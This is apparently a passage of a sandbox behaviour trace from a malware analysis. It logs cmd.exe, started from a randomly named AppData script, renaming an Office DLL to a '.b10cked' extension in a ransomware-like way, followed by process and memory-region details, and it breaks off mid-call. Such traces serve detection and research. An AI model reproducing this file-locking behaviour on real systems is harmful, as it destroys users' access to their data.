Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0175.243] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0175.244] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0175.244] GetConsoleTitleW (in: lpConsoleTitle=0x460930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.245] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0175.245] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0175.245] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0175.245] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0175.245] _wcsicmp (_String1="move", _String2=")") returned 68 [0175.245] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0175.245] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0175.245] _wcsicmp (_String1="IF", _String2="move") returned -4 [0175.245] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0175.245] _wcsicmp (_String1="REM", _String2="move") returned 5 [0175.245] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0175.249] GetConsoleTitleW (in: lpConsoleTitle=0x28f4e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.249] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0175.249] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0175.249] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0175.249] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0175.249] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0175.249] _wcsicmp (_String1="move", _String2="CD") returned 10 [0175.249] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0175.249] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0175.249] _wcsicmp (_String1="move", _String2="REN") returned -5 [0175.249] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0175.249] _wcsicmp (_String1="move", _String2="SET") returned -6 [0175.249] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0175.249] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0175.249] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0175.249] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0175.249] _wcsicmp (_String1="move", _String2="MD") returned 11 [0175.249] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0175.249] _wcsicmp (_String1="move", _String2="RD") returned -5 [0175.249] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0175.249] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0175.249] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0175.249] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0175.249] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0175.249] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0175.249] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0175.250] _wcsicmp (_String1="move", _String2="VER") returned -9 [0175.250] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0175.250] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0175.250] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0175.250] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0175.250] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0175.250] _wcsicmp (_String1="move", _String2="START") returned -6 [0175.250] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0175.250] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0175.250] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0175.251] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0175.251] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0175.251] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f29c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f294, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f294*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0175.251] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0175.251] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0175.251] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0175.251] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0175.251] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0175.251] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0175.251] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0175.252] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0175.252] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0175.253] _wcsicmp (_String1="XLINTL~1.TRX", _String2=".") returned 74 [0175.253] _wcsicmp (_String1="XLINTL~1.TRX", _String2="..") returned 74 [0175.253] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlintl~1.trx")) returned 0x2020 [0175.253] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x471f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0175.253] SetErrorMode (uMode=0x0) returned 0x0 [0175.253] SetErrorMode (uMode=0x1) returned 0x0 [0175.253] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x28ec24, lpFilePart=0x28ec0c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~1.TRX", lpFilePart=0x28ec0c*="XLINTL~1.TRX") returned 0x3c [0175.253] SetErrorMode (uMode=0x0) returned 0x1 [0175.253] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0175.253] _wcsicmp (_String1="XLINTL~1.TRX", _String2=".") returned 74 [0175.253] _wcsicmp (_String1="XLINTL~1.TRX", _String2="..") returned 74 [0175.253] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlintl~1.trx")) returned 0x2020 [0175.253] SetErrorMode (uMode=0x0) returned 0x0 [0175.253] SetErrorMode (uMode=0x1) returned 0x0 [0175.253] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x28f0a0, lpFilePart=0x28ee38 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~1.TRX", lpFilePart=0x28ee38*="XLINTL~1.TRX") returned 0x3c [0175.253] SetErrorMode (uMode=0x0) returned 0x1 [0175.253] SetErrorMode (uMode=0x0) returned 0x0 [0175.254] SetErrorMode (uMode=0x1) returned 0x0 [0175.254] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x28f2a8, lpFilePart=0x28ee38 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll.b10cked", lpFilePart=0x28ee38*="XLINTL32.DLL.trx_dll.b10cked") returned 0x4c [0175.254] SetErrorMode (uMode=0x0) returned 0x1 [0175.254] SetLastError (dwErrCode=0x0) [0175.254] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlintl32.dll.trx_dll.b10cked")) returned 0xffffffff [0175.254] GetLastError () returned 0x2 [0175.254] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x28e7b4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e7b4) returned 0x472130 [0175.254] FindNextFileW (in: hFindFile=0x472130, lpFindFileData=0x28e7b4 | out: lpFindFileData=0x28e7b4) returned 0 [0175.254] GetLastError () returned 0x12 [0175.254] FindClose (in: hFindFile=0x472130 | out: hFindFile=0x472130) returned 1 [0175.255] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x471cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x471cc0) returned 0x472130 [0175.256] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x28ea4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0175.256] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x28ea4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll", lpFilePart=0x0) returned 0x44 [0175.256] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlintl32.dll.trx_dll")) returned 0x2020 [0175.256] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlintl32.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlintl32.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0175.256] FindClose (in: hFindFile=0x472130 | out: hFindFile=0x472130) returned 1 [0175.256] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x28ea00 | out: _Buffer=" 1") returned 9 [0175.256] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.256] GetFileType (hFile=0x7) returned 0x2 [0175.332] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0175.332] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28e98c | out: lpMode=0x28e98c) returned 1 [0175.332] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.332] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x28e9c0 | out: lpConsoleScreenBufferInfo=0x28e9c0) returned 1 [0175.332] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0175.333] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x28ea00 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0175.333] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x28e9e4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28e9e4*=0x1a) returned 1 [0175.333] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.333] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0175.333] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.333] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0175.333] _get_osfhandle (_FileHandle=0) returned 0x3 [0175.333] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0175.333] SetConsoleInputExeNameW () returned 0x1 [0175.333] GetConsoleOutputCP () returned 0x1b5 [0175.333] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0175.333] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.334] exit (_Code=0) Process: id = "313" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ca0" os_pid = "0xbf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "310" os_parent_pid = "0xf68" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24172 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24173 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24174 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24175 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 24176 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 24177 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24178 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24179 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24180 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 24181 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24182 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24183 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24184 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 24185 start_va = 0x250000 end_va = 0x2b6fff entry_point = 0x250000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24186 start_va = 0x470000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 24187 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 24188 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24189 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24190 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24191 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24192 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24193 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24194 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24195 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24196 start_va = 0x2c0000 end_va = 0x387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 24197 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24198 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24199 start_va = 0x390000 end_va = 0x396fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 24200 start_va = 0x3a0000 end_va = 0x3a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 24201 start_va = 0x3b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 24202 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 24203 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 24204 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 24205 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 24206 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 24207 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 24208 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 24209 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 24210 start_va = 0x1300000 end_va = 0x15cefff entry_point = 0x1300000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 416 os_tid = 0xbd8 [0175.410] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f81c | out: lpSystemTimeAsFileTime=0x14f81c*(dwLowDateTime=0x9e730600, dwHighDateTime=0x1d440a9)) [0175.410] GetCurrentProcessId () returned 0xbf8 [0175.410] GetCurrentThreadId () returned 0xbd8 [0175.410] GetTickCount () returned 0x32fa7 [0175.410] QueryPerformanceCounter (in: lpPerformanceCount=0x14f814 | out: lpPerformanceCount=0x14f814*=23219908965) returned 1 [0175.410] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0175.410] __set_app_type (_Type=0x1) [0175.410] __p__fmode () returned 0x76b331f4 [0175.410] __p__commode () returned 0x76b331fc [0175.411] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0175.411] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0175.411] GetCurrentThreadId () returned 0xbd8 [0175.411] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbd8) returned 0x38 [0175.411] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0175.411] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0175.411] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.411] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0175.411] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f7ac | out: phkResult=0x14f7ac*=0x0) returned 0x2 [0175.411] VirtualQuery (in: lpAddress=0x14f7e3, lpBuffer=0x14f77c, dwLength=0x1c | out: lpBuffer=0x14f77c*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0175.411] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14f77c, dwLength=0x1c | out: lpBuffer=0x14f77c*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0175.411] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14f77c, dwLength=0x1c | out: lpBuffer=0x14f77c*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0175.411] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14f77c, dwLength=0x1c | out: lpBuffer=0x14f77c*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0175.411] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14f77c, dwLength=0x1c | out: lpBuffer=0x14f77c*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x11000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0175.411] GetConsoleOutputCP () returned 0x1b5 [0175.412] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0175.412] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0175.412] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.412] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0175.412] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.412] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0175.412] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.412] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0175.412] _get_osfhandle (_FileHandle=0) returned 0x3 [0175.412] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0175.412] _get_osfhandle (_FileHandle=0) returned 0x3 [0175.412] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0175.413] GetEnvironmentStringsW () returned 0x160150* [0175.413] FreeEnvironmentStringsW (penv=0x160150) returned 1 [0175.413] GetEnvironmentStringsW () returned 0x160150* [0175.413] FreeEnvironmentStringsW (penv=0x160150) returned 1 [0175.413] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e71c | out: phkResult=0x14e71c*=0x40) returned 0x0 [0175.413] RegQueryValueExW (in: hKey=0x40, 